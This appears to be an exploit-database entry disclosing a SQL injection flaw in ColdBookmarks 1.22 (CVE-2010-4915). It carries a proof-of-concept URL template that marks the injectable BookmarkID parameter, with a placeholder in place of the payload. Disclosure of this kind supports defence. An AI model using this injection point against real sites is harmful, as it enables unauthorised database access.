[] NeoSense

ColdBookmarks 1.22 - SQL Injection

Author: mr_me
type: webapps
platform: windows
port: 
date_added: 2010-09-07 
date_updated: 2010-09-07 
verified: 1 
codes: OSVDB-67868;CVE-2010-4915 
tags: 
aliases:  
screenshot_url:  
application_url: 

# ColdGen - coldbookmarks v1.22 Remote 0day SQL Injection vulnerability
# Vendor: http://www.coldgen.com/
# Found by: mr_me (net-ninja.net)

PoC
http://[target]/[path]/index.cfm?fuseaction=EditBookmark&BookmarkID=[SQLi]&CFID=XXXXXX&CFTOKEN=XXXXXXXX